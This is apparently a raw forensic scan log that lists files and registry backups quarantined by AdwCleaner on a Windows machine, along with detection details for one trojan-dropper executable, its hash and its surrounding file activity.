          0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\uninstall.dat
          0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\White-Fan.dat
          0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\WhiteDox.bin
          0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\ZamIng.bin
          0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\ondemand\
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Bluedax.bin
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Cofstock.exe
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Cofstock.exe.config
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\conf.config
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Config.xml
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Driphotity.bin
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Duosolodax.bin
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Fasefax.bin
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Hotjob.exe
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Hotjob.exe.config
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\HotSansoft.dat
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\ItTone.dll
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Lexitone.bin
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\md.xml
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Singlesoft.dat
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Stockdax.dll
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Tonin.bin
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Tris-Ex.bin
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\uninstall.dat
          0.2s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Ventokix.dat
          0.2s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Viafix.exe
          0.2s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Viafix.exe.config
          0.2s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Villa-Hold.exe.config
          0.2s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Zaamla.d.dat
          0.2s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Zaamla.dat
          0.2s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Zaamla.exe
          0.2s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\ondemand\
          0.2s C:\AdwCleaner\quarantine\files\yflfhzqpbpikflkejzzzmwhtzekagshh\
          0.2s C:\AdwCleaner\quarantine\files\yflfhzqpbpikflkejzzzmwhtzekagshh\ff.HP
          0.2s C:\AdwCleaner\quarantine\files\yflfhzqpbpikflkejzzzmwhtzekagshh\ff.NT
          0.2s C:\AdwCleaner\quarantine\files\yflfhzqpbpikflkejzzzmwhtzekagshh\snp.sc
          0.3s C:\AdwCleaner\quarantine\files\fbhcntlqzyoguexlgmesxwdbrjtmqwzd\
          0.3s C:\AdwCleaner\quarantine\files\fbhcntlqzyoguexlgmesxwdbrjtmqwzd\uninstaller.exe
          0.3s C:\AdwCleaner\quarantine\files\fbhcntlqzyoguexlgmesxwdbrjtmqwzd\uninstaller.exe.config
          0.3s C:\AdwCleaner\quarantine\files\ielbdbrbvweizniejjkegaonighxrfrb\
          0.3s C:\AdwCleaner\quarantine\files\ielbdbrbvweizniejjkegaonighxrfrb\MIO.exe
          0.3s C:\AdwCleaner\quarantine\files\ielbdbrbvweizniejjkegaonighxrfrb\loader\
          0.4s C:\AdwCleaner\quarantine\files\nyudvkpyrukdybolltvxchflegktvram\
          0.4s C:\AdwCleaner\quarantine\files\nyudvkpyrukdybolltvxchflegktvram\QQLive\
          0.4s C:\AdwCleaner\quarantine\files\nyudvkpyrukdybolltvxchflegktvram\QQLive\FailRecord.dat
          0.5s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\
          0.5s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\Profiles\
          0.5s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\Profiles\8rnx3iua.default\
          0.5s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\Profiles\8rnx3iua.default\prefs.js
          0.5s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\Profiles\8rnx3iua.default\profiles.ini
          0.5s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\Profiles\8rnx3iua.default\search.json.mozlz4
          0.6s C:\AdwCleaner\quarantine\files\vmyvkvouddwsanzcpfxrsjstzoesyukt\
          0.6s C:\AdwCleaner\quarantine\files\tkciylhxjmjrsbkzilrsksghwrxdouwq.back
          0.6s C:\AdwCleaner\quarantine\files\tzkoudrhqdrxzafwrmattbrwocwqewox.back
          0.6s C:\AdwCleaner\quarantine\files\nshnbphtlfdcaukurihucucbktvgrfuo.back
          0.7s C:\AdwCleaner\quarantine\files\lmegeqgwylgczmaugdncsoezrlfzdoow.back
          0.7s C:\AdwCleaner\quarantine\files\jidemsxupjpciijhzmqsoapuszhucfag.back
          0.7s C:\AdwCleaner\quarantine\files\hovlhcazljxzijuasrytdrtppuewtjam.back
          0.8s C:\AdwCleaner\quarantine\files\haajwoohpxztstxrtlhafsitfachjfmo.back
          0.8s C:\AdwCleaner\quarantine\files\apahvfitktjkzxvophzxcnioqbzksoqp.back
          0.8s C:\AdwCleaner\quarantine\files\fcvkhhaoafpnxinpxgtocpatvxdtiqvt.back
          0.8s C:\AdwCleaner\quarantine\files\evdtaqdoxakozjrppozslhkcjflrsund.back
          0.8s C:\AdwCleaner\quarantine\files\lrqkzkhhahecbbcndzqmcwucjlkucmif.back
          0.9s C:\AdwCleaner\quarantine\files\qekectrwctgkojzdhesvpgxwktxrjwbn.back
          0.9s C:\AdwCleaner\quarantine\files\xdheuyqjkchvboalodcocshwqpwapmas.back
          0.9s C:\AdwCleaner\quarantine\files\mkbhzixtozltywkkpgaztynbkuphdtdb.back
          1.0s C:\AdwCleaner\quarantine\files\pvosypxagsihssgnjyfyxcwezatewwum.back
          1.0s C:\AdwCleaner\quarantine\files\lqpsdbkmnkknxibvwwrsonrtakjijpzu.back
          1.0s C:\AdwCleaner\quarantine\files\smzcjlbrmvtqhfjhyginjshoqyjufruc.back
          1.0s C:\AdwCleaner\quarantine\files\damxwnvkbnzxtjfflsokifcgmotwrhpw.back
          1.1s C:\AdwCleaner\quarantine\files\virksncfeyszdlxcyurmcuhplcofsgcf.back
          1.1s C:\AdwCleaner\quarantine\files\glmtsyrtzckgrfjmnvaqymozloxekiil.back
          1.1s C:\AdwCleaner\quarantine\files\rzdkuelrbnuivrifmnklgfxvzzfrvetc.back
          1.1s C:\AdwCleaner\quarantine\files\uqtgfxjilungjdiyzwpzlmnwefohuhgy.back
          1.1s C:\AdwCleaner\quarantine\files\idflognkmdzjcvmbaecywvfxzubejjvu.back
          1.2s C:\AdwCleaner\quarantine\files\lqcgezgrlidhgtrhvxcomfelfgvdmvyt.back
          1.4s C:\AdwCleaner\quarantine\registry\reg_puhxbxsquvaobuhyfxejnebggtrfpdeq.reg
          1.5s C:\AdwCleaner\quarantine\registry\reg_tmimdswbkadtxhvqgdhuqpvbglcbmfdu.reg
          1.6s C:\AdwCleaner\quarantine\registry\reg_jdlnivjcusbkbrzcygoyhzspwyxlyggf.reg
          1.6s C:\AdwCleaner\quarantine\registry\reg_tfhkhetuluciyaeqriuqioeuyoypyxsy.reg
          1.7s C:\AdwCleaner\quarantine\registry\reg_elkwfsgmzobfidhvzhqpengxndnbnqrs.reg
          1.7s C:\AdwCleaner\quarantine\registry\reg_okibrbkxfqdrpthgjuptyhhyzfabxmei.reg
          1.8s C:\AdwCleaner\quarantine\registry\reg_wubsvososrzoldxnlntxwvkilyudnzeu.reg
          1.8s C:\AdwCleaner\quarantine\registry\reg_ldpgxoqehdbkeznqasdwthjtqljlfwbl.reg
          1.8s C:\AdwCleaner\quarantine\registry\reg_hoouldollkztgqhqkqlgbdtkjmjzbndm.reg
          1.9s C:\AdwCleaner\quarantine\registry\reg_tkndfadidnoselgvemeyjwzivzkdbfsi.reg
          1.9s C:\AdwCleaner\quarantine\registry\reg_dsvfxsmbfjqlgrtincrhckelkjmocsol.reg
          2.5s C:\AdwCleaner\quarantine\registry\reg_seqodqpqwkrfpncsawgyzpxawzputenw.reg
          2.6s C:\AdwCleaner\quarantine\registry\reg_icpltxjlklnkocbqgtzcggknkvebnjvv.reg
          2.7s C:\AdwCleaner\quarantine\registry\reg_gmmujjdiivebrljiqcjqctecrzmlbyoe.reg
          2.7s C:\AdwCleaner\quarantine\registry\reg_marasmtdffiyjsmfqktvvuzjrivxsool.reg
          2.9s C:\AdwCleaner\quarantine\registry\reg_cmqgxeamdfpuzwtxoepvczvloonypdwp.reg
          3.0s C:\AdwCleaner\quarantine\registry\reg_lyunspfrbhzgbwusmxmwbspblyhrulwy.reg
          3.1s C:\AdwCleaner\quarantine\registry\reg_lwqsugvxxjtyhoqpxtxtnpeygapjoxhm.reg
          3.2s C:\AdwCleaner\quarantine\registry\reg_pyvlcgypjrojemqatqyyrbrphjoxkdab.reg
          3.2s C:\AdwCleaner\quarantine\registry\reg_nhlqlirecitexubpkgzdofmsimewbpcz.reg
          3.3s C:\AdwCleaner\quarantine\registry\reg_xghjlxwlgaktwtkvamwqizmfzfhbckpp.reg
          3.4s C:\AdwCleaner\quarantine\registry\reg_zxsarcdkskpcuvedhjhhddlsqbgzdvzl.reg
          3.5s C:\AdwCleaner\quarantine\registry\reg_fxqtuaqoisrzsghbjocryzmwbqxxrjmj.reg
          3.5s C:\AdwCleaner\quarantine\registry\reg_ghlbbvjeqsokgnupaxajeyvokkfwkbnh.reg
          3.9s C:\AdwCleaner\quarantine\registry\reg_unkuocqomdygzgpxiizglrioehoicjtw.reg
          4.0s C:\AdwCleaner\quarantine\registry\reg_ecyvuvgkunhnpfrrpafwfcsnhgaoljbe.reg
          4.0s C:\AdwCleaner\quarantine\registry\reg_ekwhxwvhltpkcpkavxnduhlgzgslyema.reg
          4.0s C:\AdwCleaner\quarantine\registry\reg_eggguycnntdekswyvzoyybdcedlmfkjm.reg
          4.0s C:\AdwCleaner\quarantine\registry\reg_rcexoyuquzinpyavyncsanjofviavxjk.reg
          4.1s C:\AdwCleaner\quarantine\registry\reg_lpbfohsuttixwzckzjvtadqmofpumzjy.reg
          4.1s C:\AdwCleaner\quarantine\registry\reg_ydwyyidsknzaljhhqvwxrjwcxayioedb.reg
          4.1s C:\AdwCleaner\quarantine\registry\reg_pjqrynmploqoznlaxrdefubadvvlkzmm.reg
          4.2s C:\AdwCleaner\quarantine\registry\reg_daspbjyasdxdvwwwggsvvhrmzgxpnshh.reg
          4.2s C:\AdwCleaner\quarantine\registry\reg_cuetcglxejoqlxnssrmciebndydxhdrt.reg
          4.3s C:\AdwCleaner\quarantine\registry\reg_xurnwhaxeqtdzlbnzpjbokafxnxsiqum.reg
          4.3s C:\AdwCleaner\quarantine\registry\reg_tkqingwmwszmeptvclzuroubstvcckhw.reg
          4.3s C:\AdwCleaner\quarantine\registry\reg_mcoutunprxdphivyuvmoatwdyuxhyzwb.reg
          4.4s C:\AdwCleaner\quarantine\registry\reg_tgfeavmdtxngkczofnkyzphiqdfwhsfl.reg
          4.4s C:\AdwCleaner\quarantine\registry\reg_mhdzapqmugdydwjjqicquolddejvwqup.reg
          4.4s C:\AdwCleaner\quarantine\registry\reg_gzmkcboyfqzjhwapfhvqeofjaefhcttm.reg
          4.5s C:\AdwCleaner\quarantine\registry\reg_vazsqhuudufaewoypbfbikwgzqcgqfkc.reg
          4.5s C:\AdwCleaner\quarantine\registry\reg_lwugahqruqrqqjgikiohovxoculwwysx.reg
          4.6s C:\AdwCleaner\quarantine\registry\reg_xeczysjuynsfncsdctquwwgkbnofarzi.reg
          5.2s C:\AdwCleaner\quarantine\registry\reg_iioxwxczjbugugmwqmnueuszmpfqonbi.reg
          5.2s C:\AdwCleaner\quarantine\registry\reg_vrtdutftxfxohlxvramxkkrsqrnaioij.reg
          5.2s C:\AdwCleaner\quarantine\registry\reg_yvmqqvbcuamwvndvtdhefjuqlupmqiha.reg
          5.2s C:\AdwCleaner\quarantine\registry\reg_lwsnkfiuxbhfwjtitvqqzgtpowncmeix.reg
          5.3s C:\AdwCleaner\quarantine\registry\reg_fqcstvuljsuvdliaqoxcapwdameertol.reg
          5.3s C:\AdwCleaner\quarantine\registry\reg_ejsdpauzkeqyotivjhaivmsazspfnnay.reg
          5.3s C:\AdwCleaner\quarantine\registry\reg_yrdzjxchjfseqziayavxdwxeptdtlkom.reg
          5.4s C:\AdwCleaner\quarantine\registry\reg_peqwhjahmytfugksxniwczmpsseymesr.reg
          5.4s C:\AdwCleaner\quarantine\registry\reg_kiusmmvbvgzfcybhqmdrtdwqslscapcd.reg
          5.5s C:\AdwCleaner\quarantine\registry\reg_dtrxafqawoycuacbklvwcnjucjtvfqrq.reg
          5.6s C:\AdwCleaner\quarantine\registry\reg_mpldfxlkqddfqxemmzqxdxycwdwdxush.reg
          5.6s C:\AdwCleaner\quarantine\registry\reg_fiqaqrowoznmrtaduhmmjmdxvzunfivg.reg
          5.7s C:\AdwCleaner\quarantine\registry\reg_mmnettjvbtwenjqfrqilocfnkutzspil.reg
          5.8s C:\AdwCleaner\quarantine\registry\reg_diurulmulfktzboavnxvdildottqhhjx.reg
          5.8s C:\AdwCleaner\quarantine\registry\reg_xrqifbvohcnregydcpounrtfyrmjgmni.reg
          5.9s C:\AdwCleaner\quarantine\registry\reg_sjcuxpukaattukjmzpshxzvediwsgupz.reg
          6.6s C:\Windows\Prefetch\WUDFHOST.EXE-AFFEF87C.pf
          7.0s C:\Windows\System32\winevt\Logs\Microsoft-Windows-Winsock-WS2HELP%4Operational.evtx
          7.5s C:\Windows\Prefetch\NVDISPLAY.CONTAINER.EXE-98FFF787.pf
          7.7s C:\Windows\Prefetch\NVTELEMETRYCONTAINER.EXE-80BD8541.pf
         11.6s C:\Windows\Prefetch\SPOOLSV.EXE-D1F6B8B6.pf

   C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Hayzumflex.exe
      Size . . . . . . . : 983.040 bytes
      Age  . . . . . . . : 0.1 days (2017-02-13 20:38:15)
      Entropy  . . . . . : 7.6
      SHA-256  . . . . . : F271781A85B5EF989B5AEF6CAD4FB1D034ECAC38B00A527AA5170E2C2E5341B8
    > Bitdefender  . . . : Trojan.Agent.CCYW
    > Kaspersky  . . . . : Trojan-Dropper.Win32.Agent.sblf
      Fuzzy  . . . . . . : 116.0
      Forensic Cluster
         -2.3s C:\ProgramData\NVIDIA\MessageBus_4656_0x24D19933300.log
         -2.2s C:\ProgramData\NVIDIA\MessageBus_4656_0x24D18F34700.log
         -1.9s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\
         -1.9s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\LICENSE.txt
         -1.9s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\openweb.bat
         -1.9s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\SnareWindowsInstallSupport.dll
         -1.9s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\stopweb.bat
         -1.9s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\s_32.ico
         -1.9s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\WinSnare.dll
         -1.8s C:\AdwCleaner\quarantine\files\mvmfgnrbrmdbsjisivmhfrvdpvtlbouw\
         -1.7s C:\AdwCleaner\quarantine\files\fpfqjlppnsdxcoxxfuaeemqptrzrgvpn\
         -1.7s C:\AdwCleaner\quarantine\files\fpfqjlppnsdxcoxxfuaeemqptrzrgvpn\BITB16.tmp
         -1.7s C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Micros_2d44ca29ef1bb45be9e81bd7c7de23bb1bff79c7_e127e73b_1c458c2c\
         -1.7s C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Micros_2d44ca29ef1bb45be9e81bd7c7de23bb1bff79c7_e127e73b_1c458c2c\Report.wer
         -1.7s C:\AdwCleaner\quarantine\files\wlhkcwthzxcfadlnsnitwidocovyfcvy\
         -1.7s C:\AdwCleaner\quarantine\files\wlhkcwthzxcfadlnsnitwidocovyfcvy\BITB27.tmp
         -1.6s C:\AdwCleaner\quarantine\files\lvghxrkdvjdmjauuvlqiouualgvwchnk\
         -1.6s C:\AdwCleaner\quarantine\files\atsifbjehqqalokjotexydyeaawktlln\
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\cookies
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\cookies-journal
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Web Data
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Web Data-journal
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\001180cbc33c583f_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\02cdb733b079655d_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\08bc571418449ead_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\092f95ee9c1fc61c_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0ad89b7fc5facf78_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0e02ff08b4002e57_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0ed73590870cfbd2_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0ed7399215f555d7_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0ef5b10d79d9f0cb_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0fc3db66b9cbe75d_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\1b72c2d37a2af109_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\1dff67c9badf383d_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\1e20774a42d716f3_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\1f2ec90a78c46fdf_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\2009bcf78a35d470_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\20ba89671f087fc1_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\234986793e71f265_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\26968e7a0c71776d_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\2819c5233c1f77b4_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\2ac381ccd53e2ce0_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\2b11e2e523e5d524_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\3082972055161e5d_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\3a977894dc0fcd39_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\442182c02ee0a243_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\5125b9f58b582f46_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\593d0e1547012291_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\5ede7465ad814101_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\66928cc3398bdbc9_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\66e510668b4796e9_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\6e2284174f43f7b0_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\711f9f610e35a8b6_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\7150bac3e922a373_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\7589f80f2ddeab29_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\775e37b82f99c13c_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\7acdc9382bf6b139_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\7d8cebaadfd53fbf_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\7ecc93dfade6cf4e_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\8326a92c0f293bc4_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\83a226c1379f7a18_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\86850034110cf1c4_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\8d9b27c428a8f6a3_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\8f60e69a4afd6f60_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\95ff98c7e9c1b8a3_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\a1f309cd5a3eb6fa_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\a2719229322771c8_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\a2e6c4ddc62e67a7_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\b07d05bc07d9c08b_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\b3986aa6d1a5b1ca_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\b3edef432256edd5_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\b48454e7eeb33014_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\ba7c73f14dafe451_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\bd48447363dfb226_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\be189d201694bf89_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\bfbe9938bbb38577_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c0676a458818319d_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c3329b5e71fb9773_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c487316b1c7eb401_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c8bff37e9d993e8c_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c94b3024dfacfceb_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c9efb04ec241100a_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\cd31a5585d55d245_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\cd87b6402756547b_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\cda276472aafd1d9_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\cdd7d0e76bb75c18_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\ce8699f098de9a28_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\d19a15ac54bfa3ba_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\d652598e0bff0a74_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\d85bf4971be98d9f_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\dc7c883ebdb4ce43_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\dd1fa8967c9eedf1_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\e1548e7879784820_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\f4beaede20fc0699_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\f552ab47376f113e_0
         -1.3s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\f74a8c1655500d73_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\fbef9ceaf336383d_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\fddd11ea475c5135_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\index
